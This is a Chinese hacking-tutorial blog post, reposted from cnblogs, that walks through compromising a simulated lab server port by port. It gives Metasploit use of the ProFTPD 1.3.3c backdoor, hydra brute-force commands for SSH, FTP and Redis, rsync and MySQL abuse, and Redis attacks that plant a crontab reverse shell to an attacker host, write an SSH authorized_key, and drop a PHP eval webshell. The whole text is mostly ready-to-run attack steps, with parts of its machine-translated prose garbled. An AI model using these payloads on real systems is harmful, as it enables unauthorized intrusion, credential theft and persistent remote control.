您现在的位置是:首页 > 黑客技术

Web常见端口渗入-网站渗透全过程

作者:果E安全网时间:2020-10-25 17:14:44分类:黑客技术

简介申明:文章内容渗入网址为仿真模拟自然环境,文章内容只求运用全过程文章内容为信息搜集和端口渗入两一部分,21端口为ftp版本号系统漏洞8080端口为CMS的渗入信息搜集:·应用漏洞扫描工具nmap,PortScan对全部子网开展扫描仪信息:根据浏览网址获得要检测的IP为192.168.31.69该I

申明:文章内容渗入网址为仿真模拟自然环境,文章内容只求运用全过程

文章内容为信息搜集和端口渗入两一部分,21端口为ftp版本号系统漏洞 8080端口为CMS的渗入

信息搜集:

·应用漏洞扫描工具nmap ,PortScan 对全部子网开展扫描仪

1.png

信息:根据浏览网址获得要检测的IP为192.168.31.69

该IP的分布式数据库为Apache/2.4.7 总体目标系统软件为Ubuntu

对外开放的端口为21(ftp:ProFTPD 1.3.3c). 22(ssh).873 (rsync).3306(Mysql). 6379(Redis) .8080(Struts2)

浏览80端口发觉phpinfo网页页面 phpinfo可得到 该IP网址的全部配备信息

2.png

检测全过程

·21端口检测 查询到ftp的版本号,检索获知ftp为ProFTPD 1.3.3c存有侧门系统漏洞

起动MSF的终端设备

msfconsole

3.png

检索proFTPD的进攻控制模块,并加载

search proFTPD //检索proFTPD的进攻控制模块

use exploit/unit/ftp/proftpd_133c_backdoor //加载挑选控制模块

4.png

填好控制模块內容 并实行,以后反跳shell 就ok了

假如不知道该填好哪些主要参数能够 show一下

show options //必须填好的信息

set RHOSTS 192.168.31.69 //总体目标IP

run //实行

自然这仅仅对于ProFTPD 1.3.3c的运用全过程,还可以应用暴力破解密码,但你的密码库要肯定的强劲

·22端口检测 应用kali的专用工具hydra对总体目标IP的22端口开展暴力破解密码

工程爆破指令:

hydra -l(用户名) root -P(工程爆破字典) /usr/pass.txt(绝对路径,pass.txt为字典文件夹名称,能够将自身的字典添加到该文件目录下)

-V(显示信息工程爆破全过程) -t(特定线程数) 10 ssh://127.0.0.1(如果是默认设置端口,可以不写,要不是默认设置端口,得加端口xx,如ssh://127.0.0.1:xx)

7.png

暴力破解密码得到 登陆密码

8.png

得到 客户及登陆密码后能够应用ssh开展联接22端口

ssh 用户名@IP地址

9.png

这儿介绍一下hydra的一些主要参数

主要参数:

-R 再次从上一次进展然后破译

-S 英文大写,选用SSL连接

-s 小写字母,可根据这一主要参数特定非默认设置端口

-l 特定破译的客户,对特殊客户破译

-L 特定用户名字典

-p 小写字母,特定密码破解,少用,一般是选用密码字典

-P 英文大写,特定密码字典

-e 可选选择项,n:空登陆密码试探,s:应用特定客户和登陆密码试探

-C 应用灶具切分文件格式,比如“用户名:登陆密码”来替代-L/-P主要参数

-M 特定总体目标目录文档一行一条

-o 特定結果輸出文档

-f 在应用-M主要参数之后,寻找第一对用户名或是登陆密码的情况下中断破译

-t 另外运作的线程数,默认设置为16

-w 设定较大 请求超时的時间,企业秒,默认设置是30s

-v /-V显示信息详尽全过程

各协议书的实际指令:

文件格式 实例:

1、破译ssh:

hydra -L 用户名字典 -p 密码字典 -t 进程 -vV -e ns ip ssh

hydra -l 用户名 -p 密码字典 -t 进程 -o save.log -vV ip ssh

2、破译ftp:

hydra ip ftp -L 用户名字典 -P 密码字典 -t 进程(默认设置16) -vV

hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

主要参数表明:

-t另外线程数3,-l用户名是admin,字典pass.txt,储存为out.txt,-f 当破译了一个登陆密码就终止

·873端口检测 873端口为rsync服务项目存有未受权浏览系统漏洞

起动MSF的终端设备

msfconsole

10.png

检索rsync的进攻控制模块 并加载

search rsync //检索rsync的进攻控制模块

use auxiliary/scanner/rsync/modules_list //加载要进攻的控制模块

show options //必须填好的信息

set rhosts 192.168.31.69 //总体目标IP

run //实行

11.png

能够根据指令做到未受权浏览WWW文件夹名称

rsync root@192.168.31.69::

rsync root@192.168.31.69:WWW

12.png

·3306 端口检测 应用kali的专用工具开展暴力破解密码

这儿暴力破解密码应用的還是metasploit frameword

老样子,先起动MSF的终端设备

msfconsole

由于3306为mysql的服务项目,因此 要检索有关mysql的控制模块

search mysql

13.png

以后加载挑选的控制模块,我这里挑选的是

use auxiliary/scanner/mysql/mysql_login

show option

14.png

填好主要参数,能够工程爆破出登陆密码为123456

15.png

得到 用户名及登陆密码后能够根据别的控制模块开展实行sql语句

16.png

取得成功实行sql语句

20.png

·6379 端口检测 6379端口为redis服务项目,很有可能存有未受权浏览系统漏洞

要检测redis服务项目必须在当地安裝redis服务项目

安裝:

wget http://download.redis.io/releases/redis-4.0.8.tar.gz //下载链接

tar xzf redis-4.0.8.tar.gz //解压下载文档

cd redis-3.2.0 //转到redis-3.2.0文件目录下

make //到所属文件目录中安裝

21.png

安裝取得成功后必须配备一下文档,能够开展远程登录

vim redis.conf //开启环境变量

在bind 127.0.0.1前边再加上# , 把protected-mode设为no

应用

先转至redis-3.2.0的src文件目录下

cd /root/redis-3.2.0/src

然后起动redis服务项目

http://www.ots-sec.cn/ots911/vip_doc/redis-cli -h 192.168.31.69

发觉联接取得成功能够实行info

24.png

方式:

1)运用任务计划运行命令反跳shell

标准:在redis以root管理权限运作时能够写crontab来运行命令反跳shell

先在自身的网络服务器上监视一个端口:

nc -lvnp 4444

随后运行命令:

root@kali:~# redis-cli -h 192.168.31.69

192.168.31.69:6379>set x "

* * * * * bash -i >& /dev/tcp/192.168.31.158/4444 0>&1

"

ok

192.168.31.69:6379>config set dir /var/spool/cron/

ok

192.168.31.69:6379>config set dbfilename root

ok

192.168.31.69:6379>save

ok

\r

  去查看监听的端口,会反弹会shell

  2)写ssh-keygen公钥然后使用私钥登陆

  条件:Redis服务使用ROOT账号启动

  服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务

  首先需要在本生成密钥:

  25.png

  然后redis执行命令:

  192.168.31.69:6379> config set dir /root/.ssh/

  OK

  192.168.31.69:6379> config set dbfilename authorized_keys

  OK

  192.168.31.69:6379> set x "

  ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx root@kali

  "

  OK

  192.168.31.69:6379> save

  OK

  然后直接利用公钥登录ssh

  ssh -i id_rsa root@192.168.31.69

  3)写webshell

  条件:开启web服务 且web目录有写入权限 知道绝对路径

  192.168.31.69:6379>config set dir /var/www/html/

  ok

  192.168.31.69:6379>config set dbfilename shell.php

  ok

  192.168.31.69:6379>set x "<?php @eval($_POST['pass']);?>"

  ok

  192.168.31.69:6379>save

  ok

  4)使用hydra暴力破解redis密码

  hydra -P passwd.txt redis://192.168.31.69

  ·8080端口测试 发现网站Struts 发现Struts可以使用Struts Scan工具获得指定漏洞交互式shell

  下载Struts Scan:

  git clone https://github.com/Lucifer1993/struts-scan //下载

  tar xzf struts-scan //解压

  cd struts-scan-master //转到struts-scan-master 下

  python struts-scan.py //运行程序

  26.png

  扫描网站

  python struts-scan.py http://192.168.31.69:8080/index.action

  27.png

  使用给出的漏洞交互shell 执行payload

  28.png

  作者;Shadow-G

  原文链接:https://www.cnblogs.com/G-Shadow/p/10981711.html

  

  上一篇内网漫游-模拟真实环境下一篇【渗透过程】嘉缘网站 --测试

郑重声明:

果E安全网所有活动均为互联网所得,如有侵权请联系本站删除处理,转载请注明本站地址。

我来说两句